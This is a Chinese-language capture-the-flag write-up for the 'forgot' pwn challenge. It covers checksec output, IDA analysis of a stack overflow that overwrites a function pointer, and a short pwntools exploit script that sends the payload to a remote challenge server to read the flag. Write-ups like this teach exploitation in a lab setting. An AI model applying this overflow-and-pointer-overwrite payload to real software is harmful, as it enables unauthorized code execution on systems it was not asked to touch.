forgot

Posted on | In

0x01 寻找漏洞

1
2
3
4
5
6
7
8
9
10
11
xfgg@ubuntu:~/Downloads$ checksec forgot
[*] '/home/xfgg/Downloads/forgot'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

只开启了nx保护

ida分析

1
发现有两处溢出点

1
可以观察到箭头处是个函数指针,&v3 是v3在栈上的地址,&v3 + --v14 是根据&v3在栈上移动,上面的for循环是用来改变v14的值,根据溢出点函数指针v3到v12 ,变量v14都可以被我们控制,接下来再找找有没有system函数

1
发现目标函数

0x02 思路分析

1
2
接下来我的想法是利用缓冲区溢出把函数指针v12 覆盖为地址0x080486cc,接下来再控制v14的值为10, 那么 &v3+ --v14 便会指向
v12,随后cat flag

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
p = remote("111.198.29.45",39675)

payload = 'a'*0x44 + p32(0x080486CC) + 'a'*0x20 + p32(0x8)

#利用缓冲区溢出把函数指针v12 覆盖为地址0x080486cc,接下来再控制v14的值为10, 那么 &v3+ --v14 便会指向
#v12,随后cat flag
p.recvuntil(">")
p.sendline("bbb")

p.sendlineafter("> ", payload)

p.interactive()
0%